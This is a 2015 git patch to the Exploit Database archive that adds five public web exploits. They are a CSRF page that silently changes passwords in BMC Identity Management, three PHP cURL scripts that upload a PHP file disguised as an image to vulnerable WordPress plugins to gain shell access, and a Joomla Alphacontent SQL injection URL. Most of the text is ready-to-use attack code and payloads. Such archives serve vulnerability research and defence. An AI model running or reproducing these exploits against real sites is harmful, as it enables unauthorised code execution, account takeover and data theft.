From 441db36a16d6cd7f50444b4d95ed803e7cbbac8d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 26 Jun 2015 05:02:53 +0000
Subject: [PATCH] DB: 2015-06-26

5 new exploits
---
 files.csv                         |  5 +++++
 platforms/java/webapps/37372.html |  7 +++++++
 platforms/php/webapps/37370.php   | 31 +++++++++++++++++++++++++++++
 platforms/php/webapps/37371.php   | 33 +++++++++++++++++++++++++++++++
 platforms/php/webapps/37373.php   | 22 +++++++++++++++++++++
 platforms/php/webapps/37374.txt   |  7 +++++++
 6 files changed, 105 insertions(+)
 create mode 100755 platforms/java/webapps/37372.html
 create mode 100755 platforms/php/webapps/37370.php
 create mode 100755 platforms/php/webapps/37371.php
 create mode 100755 platforms/php/webapps/37373.php
 create mode 100755 platforms/php/webapps/37374.txt

diff --git a/files.csv b/files.csv
index 627ac1d6e..f7c555ef1 100755
--- a/files.csv
+++ b/files.csv
@@ -33723,3 +33723,8 @@ id,file,description,date,author,platform,type,port
 37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
+37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
+37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-03,"Sammy FORGIT",php,webapps,0
+37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery Vulnerability",2012-06-11,"Travis Lee",java,webapps,0
+37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
+37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Vulnerability",2012-06-10,xDarkSton3x,php,webapps,0
diff --git a/platforms/java/webapps/37372.html b/platforms/java/webapps/37372.html
new file mode 100755
index 000000000..23aff5419
--- /dev/null
+++ b/platforms/java/webapps/37372.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53924/info
+
+Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
+
+Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible. 
+
+<html><head><title>BMC IDM Change PW CSRF PoC</title></head> <body onload="document.getElementById('CSRF').submit()"> <form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post" id="CSRF"> <input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> <input type="hidden" name="password" value="Abc123!" /> <input type="hidden" name="passwordAgain" value="Abc123!" /> <input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> </form></body></html>
\ No newline at end of file
diff --git a/platforms/php/webapps/37370.php b/platforms/php/webapps/37370.php
new file mode 100755
index 000000000..277fe1e47
--- /dev/null
+++ b/platforms/php/webapps/37370.php
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/53855/info
+
+WordPress FCChat Widget plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+WordPress FCChat Widget plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable. 
+
+<?php
+
+$uploadfile="lo.php.gif";
+$ch = 
+curl_init("http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/Upload.php?id=1");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+         array('Filedata'=>"@$uploadfile",
+                'Submit'=>'submit'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Shell Access : 
+http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/images/1_lo.php.gif
+
+lo.php.gif
+<?php
+phpinfo();
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/37371.php b/platforms/php/webapps/37371.php
new file mode 100755
index 000000000..72887930c
--- /dev/null
+++ b/platforms/php/webapps/37371.php
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/53894/info
+
+Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected.
+
+PostShell.php
+<?php
+
+$uploadfile="lo.php.gif";
+$ch =
+curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+array('Filedata'=>"@$uploadfile",
+'is_simple'=>'is_simple'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Shell Access :
+http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif
+
+lo.php.gif
+GIF89a???????????!??????,???????D?;?
+<?php
+phpinfo();
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/37373.php b/platforms/php/webapps/37373.php
new file mode 100755
index 000000000..34d9e1bd0
--- /dev/null
+++ b/platforms/php/webapps/37373.php
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/53931/info
+
+WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected. 
+
+<?php
+
+$uploadfile="lo.php.jpg"; 
+$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-video-galleryversion-10/upload1.php");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+        array('myfile'=>"@$uploadfile",
+               'mode'=>'image'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
diff --git a/platforms/php/webapps/37374.txt b/platforms/php/webapps/37374.txt
new file mode 100755
index 000000000..81f252ede
--- /dev/null
+++ b/platforms/php/webapps/37374.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53942/info
+
+The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli] 
\ No newline at end of file